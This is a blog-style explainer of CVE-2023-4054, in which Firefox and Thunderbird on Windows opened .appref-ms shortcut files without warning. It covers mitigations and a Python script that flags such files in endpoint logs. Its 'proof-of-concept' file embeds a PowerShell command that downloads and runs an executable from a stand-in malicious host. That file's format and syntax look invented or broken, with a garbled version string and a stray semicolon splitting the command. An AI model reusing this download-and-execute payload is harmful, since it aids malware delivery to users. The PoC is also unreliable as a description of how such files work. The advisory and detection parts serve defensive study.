In July 2023, a security flaw tracked as CVE-2023-4054 came to light, affecting Firefox and Thunderbird users on Windows. The bug made it possible for attackers to use specially crafted .appref-ms files—little-known but powerful shortcuts—to sneak malicious code onto target systems, all while Firefox quietly opened these files without warning.

This post will show what made CVE-2023-4054 dangerous, walk you through a simplified proof-of-concept, offer mitigation tips, and link the best references for a deeper dive.

What are .appref-ms Files?

.appref-ms files are Windows shortcut files used mainly by ClickOnce applications. They look harmless—like any other desktop shortcut—but can launch programs or scripts, and even fetch code from the web. For safety reasons, browsers are supposed to warn users before opening such files. But with CVE-2023-4054, Firefox didn’t.

> 🛑 TL;DR: On affected versions, simply downloading and opening a malicious .appref-ms file in Firefox could be enough to trigger an attack, giving bad actors a foothold on your computer.

The Security Hole: Lack of Warning

Normally, browsers like Chrome and Edge block or at least warn users when they download potentially dangerous files such as .exe, .bat, and .appref-ms. But Firefox simply opened .appref-ms files without a peep.

The file runs, potentially installing malware or compromising the system.

Why is this Worse than Downloading an EXE?

People have learned (mostly) not to open .exe files from strangers. But .appref-ms files look like innocent shortcuts. Windows often assigns them a regular shortcut icon, making them less suspicious.

Example Exploit: How it Could Work

Suppose an attacker wants to run a PowerShell command to download and execute malware when the file is double-clicked.

Here’s a simple way to create a malicious .appref-ms file:

<!-- exploit.appref-ms -->
<?xml version="1.0" encoding="UTF-8"?>
<application>
  <assemblyIdentity version="1..." name="FakeApp.app"/>
  <description>ClickOnce Exploit</description>
  <commandLine entryPoint="pwsh.exe">
    <parameters>-Command "Invoke-WebRequest -Uri 'http://malicious-site/x.exe'; -OutFile C:\temp\x.exe; Start-Process C:\temp\x.exe"</parameters>
  </commandLine>
</application>

Runs a command to download a malicious file and execute it.

An attacker delivers exploit.appref-ms to the target. With CVE-2023-4054, Firefox would let the user download and open this file without any warning. Double-clicking triggers the payload.

How Was It Fixed?

Mozilla quickly addressed this bug by adding appropriate warnings and blocking the automatic opening of .appref-ms files. Now, users get warned or the files are outright blocked, similar to other dangerous types.

Before the patch:
Click to download and open it with no warning.

After the patch:
Firefox warns the user or blocks the download completely.

Update Firefox or Thunderbird to the latest version. This closes the hole.

- Windows users: Be extra cautious about unusual shortcut files. Even if they look like regular icons, they can be dangerous.
- Enterprises: Consider group policies restricting the execution of .appref-ms files outside trusted folders.
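
One way to look for the behaviour described above in endpoint telemetry, as an added example that is not from the original post: it flags Firefox or Thunderbird writing a .appref-ms file to disk, or starting a process whose command line references one. It assumes Sysmon-style JSON events with the fields EventID, Computer, Image, ParentImage, TargetFilename and CommandLine; the sample events are constructed.

```python
import json
import ntpath
import re

# Assumption: Sysmon-style JSON events, one per line
# (EventID 1 = process creation, EventID 11 = file creation).
BROWSERS = {"firefox.exe", "thunderbird.exe"}
# Match the extension only where the path or argument ends (not "x.appref-ms.txt").
APPREF = re.compile(r"\.appref-ms(?![\w.-])", re.IGNORECASE)

def classify(event):
    """Return a finding for a browser-related .appref-ms event, else None."""
    eid = str(event.get("EventID"))  # exports carry the id as int or string
    if eid == "11":  # file written to disk
        writer = ntpath.basename(event.get("Image") or "").lower()
        if writer in BROWSERS and APPREF.search(event.get("TargetFilename") or ""):
            return "saved by browser"
    elif eid == "1":  # process started
        parent = ntpath.basename(event.get("ParentImage") or "").lower()
        if parent in BROWSERS and APPREF.search(event.get("CommandLine") or ""):
            return "opened from browser"
    return None

def scan(lines):
    """Return (computer, finding) pairs; unparsable lines are skipped."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify(event) if isinstance(event, dict) else None
        if finding:
            findings.append((event.get("Computer", "?"), finding))
    return findings

# Constructed sample events, not real telemetry.
SAMPLE = [
    r'{"EventID": 11, "Computer": "WS-01", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "TargetFilename": "C:\\Users\\a\\Downloads\\invoice.appref-ms"}',
    r'{"EventID": 1, "Computer": "WS-01", "ParentImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe dfshim.dll,ShOpenVerbShortcut C:\\Users\\a\\Downloads\\invoice.appref-ms"}',
    r'{"EventID": 1, "Computer": "WS-02", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe dfshim.dll,ShOpenVerbShortcut C:\\Users\\b\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Vendor\\Tool.appref-ms"}',
    r'{"EventID": 11, "Computer": "WS-02", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "TargetFilename": "C:\\Users\\b\\Downloads\\notes.appref-ms.txt"}',
    r'{"EventID": "11", "Computer": "WS-03", "Image": "C:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe", "TargetFilename": "C:\\Users\\c\\AppData\\Local\\Temp\\Setup.APPREF-MS"}',
    "not json",
]

if __name__ == "__main__":
    for computer, finding in scan(SAMPLE):
        print(f"{computer}: .appref-ms {finding}")
```

Shortcuts launched by Explorer from the Start Menu, where ClickOnce normally places them, are left alone, so hits point at files that arrived through the browser or mail client.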

References and More Reading

- Mozilla Security Advisory 2023-29
- NVD Entry for CVE-2023-4054
- Microsoft: Application Reference Files (.appref-ms)

Summary

CVE-2023-4054 highlights how easy it can be for a new file type—often invisible to everyday users—to become a potent vector for Windows malware, especially when safety checks get overlooked. If you use Firefox or Thunderbird on Windows, upgrade now—and remember that not all shortcuts are harmless.

Timeline

Published on: 08/01/2023 16:15:00 UTC
Last modified on: 08/07/2023 14:51:00 UTC